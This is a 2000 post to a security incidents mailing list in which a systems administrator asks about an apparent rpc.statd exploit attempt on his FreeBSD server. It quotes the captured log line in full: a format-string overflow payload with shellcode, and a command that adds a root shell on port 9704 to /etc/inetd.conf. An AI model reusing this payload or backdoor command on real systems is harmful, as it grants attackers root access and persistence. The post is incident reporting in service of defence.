Security Incidents mailing list archives
rpc.statd exploit?
From: Dave <dave () PARKERWHITE COM>
Date: Tue, 15 Aug 2000 10:16:39 -0700
Hello all, While looking through the log files, I came across a few peculiar lines that appear to be an attempt to overflow the rpc.statd and insert a root shell into /etc/inetd.conf on port 9704. Later, I noticed that the NIC went into promisc. mode and dropped out of it twice. Is anyone familiar with this exploit? What should I be looking for to tell if it was successful. The system is FreeBSD 4.1-stable. FreeBSD's website revealed no information reguarding exploits on rpc.statd. Any Information is appreciated. Aug 12 02:59:14 rpc.statd: Invalid hostname to sm_mon: ^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF><BF>^E<F7><FF><BF>^F<F7><FF><BF> ^F<F7><FF><BF>^G<F7><FF><BF>^G<F7><FF><BF>%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x %n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^P<EB>K^M- v<AC>M-^C<EE> M-^M^(M-^C<C6> M- ^<B0>M-^C <EE> M-^M^.M-^C<C6> M-^C<C3> M-^C<EB>#M- ^<B4>1<C0>M-^C<EE> M-^HF'M-^HF*M-^C<C6> M-^HF<AB>M- F<B8><B0>+, M- <F3>M-^MN <AC>M-^MV<B8><CD>M-^@1<DB>M- <D8>@<CD>M-^@<E8><B0><FF><FF><FF>/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/i netd.conf;killall -HUP inetd Dave Byrne Systems Administrator AtomicMinds (858) 350-0012
Current thread:
- rpc.statd exploit? Dave (Aug 18)
- Re: rpc.statd exploit? azimuth (Aug 18)
- Re: rpc.statd exploit? Dave Dittrich (Aug 21)
- <Possible follow-ups>
- Re: rpc.statd exploit? Fernando Cardoso (Aug 18)
- Re: rpc.statd exploit? azimuth (Aug 18)